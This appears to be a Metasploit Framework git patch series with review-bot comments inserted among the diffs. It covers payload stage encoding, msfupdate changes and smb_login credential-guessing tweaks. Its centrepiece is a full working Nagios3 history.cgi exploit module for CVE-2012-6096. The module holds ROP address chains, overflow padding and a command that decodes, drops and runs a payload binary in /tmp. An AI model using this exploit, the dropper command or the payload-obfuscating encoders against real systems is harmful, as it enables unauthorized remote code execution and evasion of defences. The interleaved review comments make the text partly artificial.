From: James Lee Date: Sun, 13 Jan 2013 21:07:39 -0600 Subject: [PATCH 024/421] Make stage encoding possible * Fixes a bug in shikata where input greater than 0xffff length would still use 16-bit counter * Short circuits finding bad xor keys if there are no bad characters to avoid * Fixes huge performance issue with large inputs to xor-based encoders due to the use of String#+ instead of String#<< in a loop. It now takes ~3 seconds on modern hardware to encode a 750kB buffer with shikata where it used to take more than 10 minutes. The decoding side takes a similar amount of time and will increase the wait between sending the second stage and opening a usable session by several seconds. I believe this addresses the intent of pull request 905 [See #905] --- lib/msf/core/encoder.rb | 7 +++- lib/msf/core/encoder/xor.rb | 3 ++ lib/msf/core/payload/stager.rb | 37 +++++++++++++++---- lib/msf/ui/console/command_dispatcher/core.rb | 1 + modules/encoders/x86/shikata_ga_nai.rb | 12 +++--- 5 files changed, 47 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/encoder.rb b/lib/msf/core/encoder.rb index b1b17cab23d4..b8ebff5635a4 100644 --- a/lib/msf/core/encoder.rb +++ b/lib/msf/core/encoder.rb @@ -308,7 +308,12 @@ def do_encode(state) while (offset < state.buf.length) block = state.buf[offset, decoder_block_size] - state.encoded += encode_block(state, + # Append here (String#<<) instead of creating a new string with + # String#+ because the allocations kill performance with large + # buffers. This isn't usually noticeable on most shellcode, but + # when doing stage encoding on meterpreter (~750k bytes) the + # difference is 2 orders of magnitude. + state.encoded << encode_block(state, block + ("\x00" * (decoder_block_size - block.length))) offset += decoder_block_size diff --git a/lib/msf/core/encoder/xor.rb b/lib/msf/core/encoder/xor.rb index 69b6db7d3079..4c351ac45e85 100644 --- a/lib/msf/core/encoder/xor.rb +++ b/lib/msf/core/encoder/xor.rb 
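Review bot: In `do_encode`, replacing `+=` with `state.encoded << encode_block(...)` changes the semantics from rebinding to in-place mutation. That is only safe if `state.encoded` is a fresh, unfrozen String owned by this state when the loop starts; if it was initialised from a shared or frozen value, the append would alter that value or raise. The initialisation is outside the hunk, so I would confirm it and extend the new comment with `# state.encoded must be a fresh, mutable String at this point`.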
@@ -26,6 +26,9 @@ def encode_block(state, block) # Finds keys that are incompatible with the supplied bad character list. # def find_bad_keys(buf, badchars) + # Short circuit if there are no badchars + return super if badchars.length == 0 + bad_keys = Array.new(decoder_key_size) { Hash.new } byte_idx = 0 diff --git a/lib/msf/core/payload/stager.rb b/lib/msf/core/payload/stager.rb index 45674bc0f10e..7a66ae32038f 100644 --- a/lib/msf/core/payload/stager.rb +++ b/lib/msf/core/payload/stager.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'msf/core' +require 'msf/core/option_container' ### # @@ -8,6 +9,17 @@ ### module Msf::Payload::Stager + def initialize(info={}) + super + + register_advanced_options( + [ + Msf::OptBool.new("EnableStageEncoding", [ false, "Encode the second stage payload", false ]), + Msf::OptString.new("StageEncoder", [ false, "Encoder to use if EnableStageEncoding is set", nil ]), + ], Msf::Payload::Stager) + + end + # # Sets the payload type to a stager. # @@ -65,6 +77,11 @@ def stage_over_connection? true end + def encode_stage? + # Convert to string in case it hasn't been normalized + !!(datastore['EnableStageEncoding'].to_s == "true") + end + # # Generates the stage payload and substitutes all offsets. # @@ -75,8 +92,8 @@ def generate_stage # Substitute variables in the stage substitute_vars(p, stage_offsets) if (stage_offsets) - # Encode the stage of stage encoding is enabled - #p = encode_stage(p) + # Encode the stage if stage encoding is enabled + p = encode_stage(p) return p end 
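Review bot: In `find_bad_keys` (xor.rb), the new guard `return super if badchars.length == 0` raises NoMethodError when `badchars` is nil. It also makes the method return whatever the parent returns, which has to have the same shape as the `Array.new(decoder_key_size) { Hash.new }` built on the normal path. The parent implementation is not visible here, so that second point needs checking. I would write the guard as `return super if badchars.nil? || badchars.empty?` and say in the comment what `super` yields. The rest of the method is outside the hunk.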
@@ -101,14 +118,15 @@ def handle_connection(conn, opts={}) p = (self.stage_prefix || '') + p end + sending_msg = "Sending #{encode_stage? ? "encoded ":""}stage" + sending_msg << " (#{p.length} bytes)" # The connection should always have a peerhost (even if it's a # tunnel), but if it doesn't, erroring out here means losing the # session, so make sure it does, just to be safe. if conn.respond_to? :peerhost - print_status("Sending stage (#{p.length} bytes) to #{conn.peerhost}") - else - print_status("Sending stage (#{p.length} bytes)") + sending_msg << " to #{conn.peerhost}" end + print_status(sending_msg) # Send the stage conn.put(p) @@ -146,15 +164,20 @@ def handle_intermediate_stage(conn, payload) # Encodes the stage prior to transmission def encode_stage(stg) + return stg unless encode_stage? - # If DisableStageEncoding is set, we do not encode the stage - return stg if datastore['DisableStageEncoding'] =~ /^(y|1|t)/i + if datastore["StageEncoder"].nil? or datastore["StageEncoder"].empty? + stage_enc_mod = nil + else + stage_enc_mod = datastore["StageEncoder"] + end # Generate an encoded version of the stage. We tell the encoding system # to save edi to ensure that it does not get clobbered. encp = Msf::EncodedPayload.create( self, 'Raw' => stg, + 'Encoder' => stage_enc_mod, 'SaveRegisters' => ['edi'], 'ForceEncode' => true) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index e1d17f3d92b2..b1deb090582a 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2365,6 +2365,7 @@ def tab_complete_option(str, words) return option_values_payloads() if opt.upcase == 'PAYLOAD' return option_values_targets() if opt.upcase == 'TARGET' return option_values_nops() if opt.upcase == 'NOPS' + return option_values_encoders() if opt.upcase == 'StageEncoder' end # Well-known option names specific to auxiliaries 
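Review bot: In the core.rb hunk (`tab_complete_option`), the added comparison `opt.upcase == 'StageEncoder'` can never be true, because `opt.upcase` contains no lower-case letters and the literal does. Tab completion for the new option therefore never reaches `option_values_encoders()`. The line should read `return option_values_encoders() if opt.upcase == 'STAGEENCODER'`, in line with the three comparisons above it. The method starts and ends outside the hunk.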
diff --git a/modules/encoders/x86/shikata_ga_nai.rb b/modules/encoders/x86/shikata_ga_nai.rb index 6cfeec98ea41..ffc602db844b 100644 --- a/modules/encoders/x86/shikata_ga_nai.rb +++ b/modules/encoders/x86/shikata_ga_nai.rb @@ -111,10 +111,10 @@ def generate_shikata_block(state, length, cutoff) # Clear the counter register clear_register = Rex::Poly::LogicalBlock.new('clear_register', - "\x31\xc9", - "\x29\xc9", - "\x33\xc9", - "\x2b\xc9") + "\x31\xc9", # xor ecx,ecx + "\x29\xc9", # sub ecx,ecx + "\x33\xc9", # xor ecx,ecx + "\x2b\xc9") # sub ecx,ecx # Initialize the counter after zeroing it init_counter = Rex::Poly::LogicalBlock.new('init_counter') @@ -126,8 +126,10 @@ def generate_shikata_block(state, length, cutoff) if (length <= 255) init_counter.add_perm("\xb1" + [ length ].pack('C')) - else + elsif (length <= 65536) init_counter.add_perm("\x66\xb9" + [ length ].pack('v')) + else + init_counter.add_perm("\xb9" + [ length ].pack('V')) end # Key initialization block From 04b35a38ff0ba66a9d00f304a50b8c23c39faa94 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 14 Jan 2013 14:59:32 -0600 Subject: [PATCH 025/421] Update MSB ref --- modules/exploits/windows/browser/ie_cbutton_uaf.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/windows/browser/ie_cbutton_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb index 8b36b5e4a211..7aa41c04fe60 100644 --- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb +++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb 
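Review bot: In `generate_shikata_block`, the new middle branch tests `length <= 65536` but packs with `[ length ].pack('v')`, and a 16-bit field holds at most 65535, so a length of exactly 65536 is packed as zero. That is the integer truncation the commit message describes for lengths above 0xffff, left in place for one value. The bound should be `elsif (length <= 65535)` so that 65536 falls through to the `pack('V')` branch. The function continues outside the hunk.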
@@ -48,6 +48,7 @@ def initialize(info={}) [ 'CVE', '2012-4792' ], [ 'US-CERT-VU', '154201' ], [ 'BID', '57070' ], + [ 'MSB', 'MS13-008' ], [ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'], [ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'], [ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ], From db4a392de2b068eeb2768beaad89110e46d09c65 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 14 Jan 2013 13:58:16 -0800 Subject: [PATCH 026/421] Msfupdate should check for installation validity This fix will allow people to at least solve their own msfupdate problems by registering for Community Edition. [SeeRM #7690] --- msfupdate | 35 +++++++++++++++++++++++++++++------ 1 file changed, 29 insertions(+), 6 deletions(-) diff --git a/msfupdate b/msfupdate index be7f75dee586..df8ae19395a3 100755 --- a/msfupdate +++ b/msfupdate @@ -24,11 +24,13 @@ $stderr.puts "[*]" $stderr.puts "" if not (Process.uid == 0 or File.stat(msfbase).owned?) - $stderr.puts "[-] ERROR: User running msfupdate does not own the metasploit install" - $stderr.puts "Please run msfupdate as the same user who installed metasploit." + $stderr.puts "[-] ERROR: User running msfupdate does not own the Metasploit installation" + $stderr.puts "[-] Please run msfupdate as the same user who installed Metasploit." + exit 0x10 end -def is_pro +# Are you an installer, or did you get here via a source checkout? +def is_installed File.exists?(File.expand_path(File.join(@msfbase_dir, "..", "engine", "update.rb"))) end 
@@ -147,12 +149,33 @@ if is_git system("git", "merge", "#{remote}/#{branch}") end -if is_pro +if is_installed update_script = File.expand_path(File.join(@msfbase_dir, "..", "engine", "update.rb")) - system("ruby", update_script) + product_key = File.expand_path(File.join(@msfbase_dir, "..", "engine", "license", "product.key")) + if File.exists? product_key + if File.readable? product_key + system("ruby", update_script) + else + $stdout.puts "[-] ERROR: Failed to update Metasploit installation" + $stdout.puts "" + $stdout.puts "[-] You must be able to read the product key for the" + $stdout.puts "[-] Metasploit installation in order to run msfupdate." + $stdout.puts "[-] Usually, this means you must be root (EUID 0)." + exit 0x10 + end + else + $stdout.puts "[-] ERROR: Failed to update Metasploit installation" + $stdout.puts "" + $stdout.puts "[-] In order to update your Metasploit installation," + $stdout.puts "[-] you must first register it through the UI, here:" + $stderr.puts "[-] https://localhost:3790 (note, Metasploit Community" + $stderr.puts "[-] Edition is totally free and takes just a few seconds" + $stderr.puts "[-] to register!)" + exit 0x11 + end end -unless is_svn || is_git || is_pro +unless is_svn || is_git || is_installed raise RuntimeError, "Cannot determine checkout type: `#{@msfbase_dir}'" end From 279a61d0f4f6d6128902d22d0da45d828e11a68f Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 14 Jan 2013 14:26:42 -0800 Subject: [PATCH 027/421] Add the optional pause for Windows --- msfupdate | 27 +++++++++++++++++---------- 1 file changed, 17 insertions(+), 10 deletions(-) diff --git a/msfupdate b/msfupdate index df8ae19395a3..058fd8f51eaa 100755 --- a/msfupdate +++ b/msfupdate 
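Review bot: The two failure branches added under `if is_installed` print their `[-] ERROR` text with `$stdout.puts`, and the unregistered branch switches to `$stderr.puts` halfway through the same message. With either stream redirected the user gets half a message, and the rest of the script reports errors on `$stderr`. I would use `$stderr.puts` for every line in both blocks. The re-indented `system("ruby", update_script)` also resolves `ruby` through PATH in a script the new text says usually runs as root; calling the interpreter by absolute path would be safer.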
@@ -23,6 +23,7 @@ $stderr.puts "[*] Attempting to update the Metasploit Framework..." $stderr.puts "[*]" $stderr.puts "" +# Bail right away, no waiting around for consoles. if not (Process.uid == 0 or File.stat(msfbase).owned?) $stderr.puts "[-] ERROR: User running msfupdate does not own the Metasploit installation" $stderr.puts "[-] Please run msfupdate as the same user who installed Metasploit." @@ -58,6 +59,16 @@ def print_deprecation_warning $stdout.puts "[*] Please adjust your egress firewall rules accordingly." end +def maybe_wait_and_exit(exit_code=0) + if @actually_wait + $stdout.puts "" + $stdout.puts "[*] Please hit enter to exit" + $stdout.puts "" + $stdin.readline + exit exit_code + end +end + # Some of these args are meaningful for SVN, some for Git, # some for both. Fun times. @args.each_with_index do |arg,i| @@ -104,7 +115,7 @@ if is_svn $stderr.puts "[-] If you used a binary installer, make sure you run the symlink in" $stderr.puts "[-] /usr/local/bin instead of running this file directly (e.g.: ./msfupdate)" $stderr.puts "[-] to ensure a proper environment." - exit 1 + maybe_wait_and_exit 1 else # Cleanup worked, go ahead and update system("svn", "update", *@args) @@ -136,7 +147,7 @@ if is_git $stderr.puts "[-] If you used a binary installer, make sure you run the symlink in" $stderr.puts "[-] /usr/local/bin instead of running this file directly (e.g.: ./msfupdate)" $stderr.puts "[-] to ensure a proper environment." - exit 1 + maybe_wait_and_exit 1 elsif not committed system("git", "stash") $stdout.puts "[*] Stashed local changes to avoid merge conflicts." @@ -161,7 +172,7 @@ if is_installed $stdout.puts "[-] You must be able to read the product key for the" $stdout.puts "[-] Metasploit installation in order to run msfupdate." $stdout.puts "[-] Usually, this means you must be root (EUID 0)." - exit 0x10 + maybe_wait_and_exit 10 end else $stdout.puts "[-] ERROR: Failed to update Metasploit installation" 
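Review bot: `maybe_wait_and_exit` calls `exit exit_code` only inside `if @actually_wait`, so when the wait flag is unset it returns and the script keeps running. Every `exit 1`, `exit 0x10` and `exit 0x11` that this patch replaces, in this hunk and the later ones, therefore stops being an exit on the non-waiting path. A failed cleanup or an unreadable product key no longer ends the run or sets a non-zero status. Move `exit exit_code` below the `end` of the `if`, so the pause stays optional and the exit does not. The replacements also change the status values from `0x10`/`0x11` (16/17) to `10`/`11` while the ownership check at the top keeps `exit 0x10`; one convention should be used throughout.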
@@ -171,7 +182,7 @@ if is_installed $stderr.puts "[-] https://localhost:3790 (note, Metasploit Community" $stderr.puts "[-] Edition is totally free and takes just a few seconds" $stderr.puts "[-] to register!)" - exit 0x11 + maybe_wait_and_exit 11 end end @@ -179,9 +190,5 @@ unless is_svn || is_git || is_installed raise RuntimeError, "Cannot determine checkout type: `#{@msfbase_dir}'" end -if @actually_wait - $stderr.puts "" - $stderr.puts "[*] Please hit enter to exit" - $stderr.puts "" - $stdin.readline -end +maybe_wait_and_exit(0) + From 18f81fd6f47e9b03932e85846e614f62db61905f Mon Sep 17 00:00:00 2001 From: Jose Selvi Date: Tue, 15 Jan 2013 15:32:32 +0100 Subject: [PATCH 028/421] Nagios3 history.cgi exploit --- .../unix/webapp/nagios3_history_cgi.rb | 211 ++++++++++++++++++ 1 file changed, 211 insertions(+) create mode 100644 modules/exploits/unix/webapp/nagios3_history_cgi.rb diff --git a/modules/exploits/unix/webapp/nagios3_history_cgi.rb b/modules/exploits/unix/webapp/nagios3_history_cgi.rb new file mode 100644 index 000000000000..c8c0cfb39f94 --- /dev/null +++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb 
@@ -0,0 +1,211 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Nagios3 history.cgi Host Command Execution', + 'Description' => %q{ + This module abuses a command injection vulnerability in the + Nagios3 history.cgi script. + }, + 'Author' => [ + 'Anonymous ', # Original finding + 'blasty ', # First working exploit + 'Jose Selvi ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-6096' ], + [ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2012-December/089125.html' ], + [ 'URL', 'http://pastebin.com/FJUNyTaj' ], + ], + 'Platform' => ['unix', 'linux'], + 'Arch' => [ ARCH_X86, ARCH_X86_64 ], + 'Privileged' => false, + 'Payload' => + { + 'Space' => 200, # Due to a system() parameter length limitation + 'BadChars' => '', # It'll be base64 encoded + }, + 'Targets' => + [ + [ 'Automatic Target', { 'auto' => true }], + # NOTE: All addresses are from the history.cgi binary + [ 'CentOS (nagios-3.4.3-1.el6.i686.rpm)', + { + 'BannerRE' => 'CentOS', + 'VersionRE' => '3.4.3', + 'Arch' => ARCH_X86, + 'Offset' => 0xc43, + 'RopStack' => + [ + 0x0804c260, # unescape_cgi_input() + 0x08048f04, # pop, ret + 0x08079b60, # buffer addr + 0x08048bb0, # system() + 0x08048e70, # exit() + 0x08079b60 # buffer addr + ] + } + ], + [ 'Debian (nagios3_3.0.6-4~lenny2_i386.deb)', # From original exploit. Not tested. 
+ { + 'BannerRE' => 'Debian', + 'VersionRE' => '3.3.0', + 'Arch' => ARCH_X86, + 'Offset' => 0xc37, + 'RopStack' => + [ + 0x0804b620, # unescape_cgi_input() + 0x08048fe4, # pop, ret + 0x080727a0, # buffer addr + 0x08048c7c, # system() + 0xdeafbabe, # if should be exit() but it's not + 0x080727a0 # buffer addr + ] + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Dec 09 2012')) + + register_options( + [ + OptString.new('URI', [true, "The full URI path to history.cgi", "/nagios3/cgi-bin/history.cgi"]), + OptString.new('USER', [false, "The username to authenticate with", "guest"]), + OptString.new('PASS', [false, "The password to authenticate with", "guest"]), + ], self.class) + end + + def detect_version(uri) + # Send request + res = send_request_raw({ + 'uri' => uri, + 'method' => 'GET', + }, 90) + + # Detection unknown if error + if res.nil? + print_error("Unable to get a response from the server") + return nil, nil + end + + # Extract banner from response + banner = res.headers['Server'] + + # Version undetected by now - String = "Nagios® Core™ 3.4.1 -" + version = nil + + return version, banner + end + + def exploit + uri = normalize_uri(datastore['URI']) + + # Automatic Targeting + mytarget = nil + if (target['auto']) + print_status("Automatically detecting the target...") + + # Get version information + version, banner = detect_version(uri) + if not banner.nil? + print_status("Web Server banner: #{banner}") + end + if not version.nil? + print_status("Nagios version detected: #{version}") + end + + # No banner, no target + if banner.nil? + fail_with(Exploit::Failure::NoTarget, "No matching target") + end + + # Try regex for each target + self.targets.each do |t| + if t['BannerRE'].nil? # It doesn't exist in Auto Target + next + end + regexp = Regexp.escape(t['BannerRE']) + if ( banner =~ /#{regexp}/ ) then + mytarget = t + break + end + end + + if mytarget.nil? 
+ fail_with(Exploit::Failure::NoTarget, "No matching target") + end + else + mytarget = target + end + + print_status("Selected Target: #{mytarget.name}") + print_status("Sending request to http://#{rhost}:#{rport}#{uri}") + + # Generate a payload ELF to execute + elfbin = generate_payload_exe + elfb64 = Rex::Text.encode_base64(elfbin) + + # Generate random filename + tempfile = '/tmp/' + rand_text_alphanumeric(10) + + # Generate command-line execution + cmd = 'echo ' + elfb64 + '|base64 -d|tee ' + tempfile + ';chmod 700 ' + tempfile + ';rm -rf ' + tempfile + '|' + tempfile + ';' + host_value = cmd.gsub!(' ', '${IFS}') + + # Generate 'host' parameter value + padding_size = mytarget['Offset'] - host_value.length + host_value << rand_text_alphanumeric( padding_size ) + + # Generate ROP + host_value << mytarget['RopStack'].pack('V*') + + # Send exploit + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri, + 'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") }, + 'vars_get' => + { + 'host' => host_value + } + }, 10) + + if(not res) + if session_created? + print_status("Session created, enjoy!") + else + print_error("No response from the server") + end + return + end + + if(res.code == 401) + print_error("Please specify correct values for USER and PASS") + return + end + + if(res.code == 404) + print_error("Please specify the correct path to history.cgi in the URI parameter") + return + end + + print_status("Unknown response") + end + +end From d36e38fca61b2eceeaa208304047bbf348ceebcd Mon Sep 17 00:00:00 2001 
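Review bot: The `Description` calls this a command injection, but `exploit` pads the `host` parameter up to `mytarget['Offset']` and appends `mytarget['RopStack']`, which is a stack buffer overflow. The text should say so, since the two classes are triaged and mitigated differently; `This module exploits a stack buffer overflow in the host parameter of the Nagios3 history.cgi script.` would match the code. Separately, `detect_version` always returns `version` as nil, so the `Nagios version detected` branch is dead and the `VersionRE` keys in `Targets` are never read. Either remove them or add the comment `# version matching is not implemented; targets are selected on the Server banner only`.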
From: James Lee Date: Tue, 15 Jan 2013 10:34:31 -0600 Subject: [PATCH 029/421] Move encoding into handle_connection * Allows payloads that override generate_stage to still take advantage of stage encoding * Also adds doc comments for a few methods --- lib/msf/core/encoded_payload.rb | 6 +++-- lib/msf/core/payload/stager.rb | 41 ++++++++++++++++++++++++++++----- 2 files changed, 39 insertions(+), 8 deletions(-) diff --git a/lib/msf/core/encoded_payload.rb b/lib/msf/core/encoded_payload.rb index 413d1e521f81..d5c481e7cef7 100755 --- a/lib/msf/core/encoded_payload.rb +++ b/lib/msf/core/encoded_payload.rb @@ -41,6 +41,7 @@ def initialize(framework, pinst, reqs) # This method generates the full encoded payload and returns the encoded # payload buffer. # + # @return [String] The encoded payload. def generate(raw = nil) self.raw = raw self.encoded = nil @@ -86,8 +87,9 @@ def generate(raw = nil) # # Generates the raw payload from the payload instance. This populates the - # raw attribute. + # {#raw} attribute. # + # @return [String] The raw, unencoded payload. def generate_raw self.raw = (reqs['Prepend'] || '') + pinst.generate + (reqs['Append'] || '') @@ -216,7 +218,7 @@ def encode # If the encoded payload is nil, raise an exception saying that we # suck at life. if (self.encoded == nil) - encoder = nil + self.encoder = nil raise NoEncodersSucceededError, "#{pinst.refname}: All encoders failed to encode.", diff --git a/lib/msf/core/payload/stager.rb b/lib/msf/core/payload/stager.rb index 7a66ae32038f..60f46a0e7c8c 100644 --- a/lib/msf/core/payload/stager.rb +++ b/lib/msf/core/payload/stager.rb @@ -30,6 +30,9 @@ def payload_type # # Return the stager payload's raw payload. # + # Can be nil if the stager is not pre-assembled. + # + # @return [String,nil] def payload return module_info['Stager']['Payload'] end 
@@ -37,6 +40,7 @@ def payload # # Return the stager payload's assembly text, if any. # + # @return [String,nil] def assembly return module_info['Stager']['Assembly'] end @@ -44,6 +48,9 @@ def assembly # # Return the stager payload's offsets. # + # These will be used for substitutions during stager generation. + # + # @return [Hash] def offsets return module_info['Stager']['Offsets'] end @@ -51,6 +58,9 @@ def offsets # # Returns the raw stage payload. # + # Can be nil if the final stage is not pre-assembled. + # + # @return [String,nil] def stage_payload return module_info['Stage']['Payload'] end @@ -58,6 +68,7 @@ def stage_payload # # Returns the assembly text of the stage payload. # + # @return [String] def stage_assembly return module_info['Stage']['Assembly'] end @@ -65,6 +76,10 @@ def stage_assembly # # Returns variable offsets within the stage payload. # + # These will be used for substitutions during generation of the final + # stage. + # + # @return [Hash] def stage_offsets return module_info['Stage']['Offsets'] end @@ -77,6 +92,11 @@ def stage_over_connection? true end + + # + # Whether to use an Encoder on the second stage + # + # @return [Boolean] def encode_stage? # Convert to string in case it hasn't been normalized !!(datastore['EnableStageEncoding'].to_s == "true") @@ -85,6 +105,7 @@ def encode_stage? # # Generates the stage payload and substitutes all offsets. # + # @return [String] The generated payload stage, as a string. def generate_stage # Compile the stage as necessary p = build(stage_payload, stage_assembly, stage_offsets, '-stg1') 
@@ -92,21 +113,23 @@ def generate_stage # Substitute variables in the stage substitute_vars(p, stage_offsets) if (stage_offsets) - # Encode the stage if stage encoding is enabled - p = encode_stage(p) - return p end # # Transmit the associated stage. # + # @param (see handle_connection_stage) + # @return (see handle_connection_stage) def handle_connection(conn, opts={}) # If the stage should be sent over the client connection that is # established (which is the default), then go ahead and transmit it. if (stage_over_connection?) p = generate_stage + # Encode the stage if stage encoding is enabled + p = encode_stage(p) + # Give derived classes an opportunity to an intermediate state before # the stage is sent. This gives derived classes an opportunity to # augment the stage and the process through which it is read on the @@ -146,10 +169,15 @@ def handle_connection(conn, opts={}) end # - # Called by handle_connection to allow the stage to process - # whatever it is it needs to process. The default is to simply attempt to - # create a session. + # Allow the stage to process whatever it is it needs to process. + # + # Override to deal with sending the final stage in cases where + # {#generate_stage} is not the whole picture, such as when uploading + # an executable. The default is to simply attempt to create a session + # on the given +conn+ socket with {Handler#create_session}. # + # @param (see Handler#create_session) + # @return (see Handler#create_session) def handle_connection_stage(conn, opts={}) create_session(conn, opts) end @@ -180,6 +208,7 @@ def encode_stage(stg) 'Encoder' => stage_enc_mod, 'SaveRegisters' => ['edi'], 'ForceEncode' => true) + print_status("Encoded stage with #{encp.encoder.refname}") # If the encoding succeeded, use the encoded buffer. Otherwise, fall # back to using the non-encoded stage From a06d49a8be07d235756f39a228500de546d840f1 Mon Sep 17 00:00:00 2001 
From: sinn3r Date: Tue, 15 Jan 2013 11:25:02 -0600 Subject: [PATCH 030/421] Return symbols STOP_ON_SUCCESS is being ignored because the module's login function doesn't pass a symbol to the mixin. This addresses that. --- modules/auxiliary/scanner/smb/smb_login.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 9e5c7e334577..269e569fd8b4 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -215,10 +215,15 @@ def try_user_pass(domain, user, pass) print_status(output_message % "GUEST LOGIN") end end + + return :next_user + when *@correct_credentials_status_codes print_status(output_message % "FAILED LOGIN, VALID CREDENTIALS" ) report_creds(domain,user,pass,false) validuser_case_sensitive?(domain, user, pass) + return :skip_user + when 'STATUS_LOGON_FAILURE', 'STATUS_ACCESS_DENIED' vprint_error(output_message % "FAILED LOGIN") else From 6e6e90d7331c70bdd27fd8b35b74e043f4c0df6b Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 15 Jan 2013 11:36:49 -0600 Subject: [PATCH 031/421] Cosmetic changes --- modules/auxiliary/scanner/smb/smb_login.rb | 63 ++++++++++++---------- 1 file changed, 35 insertions(+), 28 deletions(-) diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 269e569fd8b4..767a140d1ee4 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -31,10 +31,11 @@ def initialize and connected to a database this module will record successful logins and hosts so you can track your access. }, - 'Author' => [ - 'tebo ', # Original - 'Ben Campbell ' # Refactoring - ], + 'Author' => + [ + 'tebo ', # Original + 'Ben Campbell ' # Refactoring + ], 'References' => [ [ 'CVE', '1999-0506'], # Weak password 
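Review bot: In `try_user_pass`, `return :next_user` is placed after the whole success branch, so as far as the hunk shows, a login the server mapped to guest returns the same symbol as a real authenticated login. With STOP_ON_SUCCESS set, that would end the scan of the host on a guest mapping and overstate what the credentials give access to. I would return `:next_user` only on the non-guest path and let the guest case fall through. The `STATUS_LOGON_FAILURE` and `else` branches still return whatever `vprint_error` returns, which deserves the comment `# no symbol returned: the mixin continues with the next password`. The `case` statement starts outside the hunk, so the guest test is inferred from the `GUEST LOGIN` messages.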
@@ -45,15 +46,18 @@ def initialize deregister_options('RHOST','USERNAME','PASSWORD') @accepts_guest_logins = {} - @correct_credentials_status_codes = ["STATUS_INVALID_LOGON_HOURS", - "STATUS_INVALID_WORKSTATION", - "STATUS_ACCOUNT_RESTRICTION", - "STATUS_ACCOUNT_EXPIRED", - "STATUS_ACCOUNT_DISABLED", - "STATUS_ACCOUNT_RESTRICTION", - "STATUS_PASSWORD_EXPIRED", - "STATUS_PASSWORD_MUST_CHANGE", - "STATUS_LOGON_TYPE_NOT_GRANTED"] + + @correct_credentials_status_codes = [ + "STATUS_INVALID_LOGON_HOURS", + "STATUS_INVALID_WORKSTATION", + "STATUS_ACCOUNT_RESTRICTION", + "STATUS_ACCOUNT_EXPIRED", + "STATUS_ACCOUNT_DISABLED", + "STATUS_ACCOUNT_RESTRICTION", + "STATUS_PASSWORD_EXPIRED", + "STATUS_PASSWORD_MUST_CHANGE", + "STATUS_LOGON_TYPE_NOT_GRANTED" + ] # These are normally advanced options, but for this module they have a # more active role, so make them regular options. @@ -63,7 +67,7 @@ def initialize OptString.new('SMBUser', [ false, "SMB Username" ]), OptString.new('SMBDomain', [ false, "SMB Domain", '']), OptBool.new('PRESERVE_DOMAINS', [ false, "Respect a username that contains a domain name.", true]), - OptBool.new('RECORD_GUEST', [ false, "Record guest-privileged random logins to the database", false]), + OptBool.new('RECORD_GUEST', [ false, "Record guest-privileged random logins to the database", false]) ], self.class) end 
@@ -98,19 +102,22 @@ def check_login_status(domain, user, pass) connect() status_code = "" begin - simple.login( datastore['SMBName'], - user, - pass, - domain, - datastore['SMB::VerifySignature'], - datastore['NTLM::UseNTLMv2'], - datastore['NTLM::UseNTLM2_session'], - datastore['NTLM::SendLM'], - datastore['NTLM::UseLMKey'], - datastore['NTLM::SendNTLM'], - datastore['SMB::Native_OS'], - datastore['SMB::Native_LM'], - {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost}) + simple.login( + datastore['SMBName'], + user, + pass, + domain, + datastore['SMB::VerifySignature'], + datastore['NTLM::UseNTLMv2'], + datastore['NTLM::UseNTLM2_session'], + datastore['NTLM::SendLM'], + datastore['NTLM::UseLMKey'], + datastore['NTLM::SendNTLM'], + datastore['SMB::Native_OS'], + datastore['SMB::Native_LM'], + {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} + ) + # Windows SMB will return an error code during Session Setup, but nix Samba requires a Tree Connect: simple.connect("\\\\#{datastore['RHOST']}\\IPC$") status_code = 'STATUS_SUCCESS' @@ -212,7 +219,7 @@ def try_user_pass(domain, user, pass) print_status(output_message % "GUEST LOGIN") report_creds(domain,user,pass,true) elsif datastore['VERBOSE'] - print_status(output_message % "GUEST LOGIN") + print_status(output_message % "GUEST LOGIN") end end From 4883cf4b01af4c64778d0cb84781fb13978e2a5f Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 15 Jan 2013 12:49:43 -0600 Subject: [PATCH 032/421] Minor doc comment additions --- lib/msf/core/payload/stager.rb | 3 ++- 1 file changed, 2 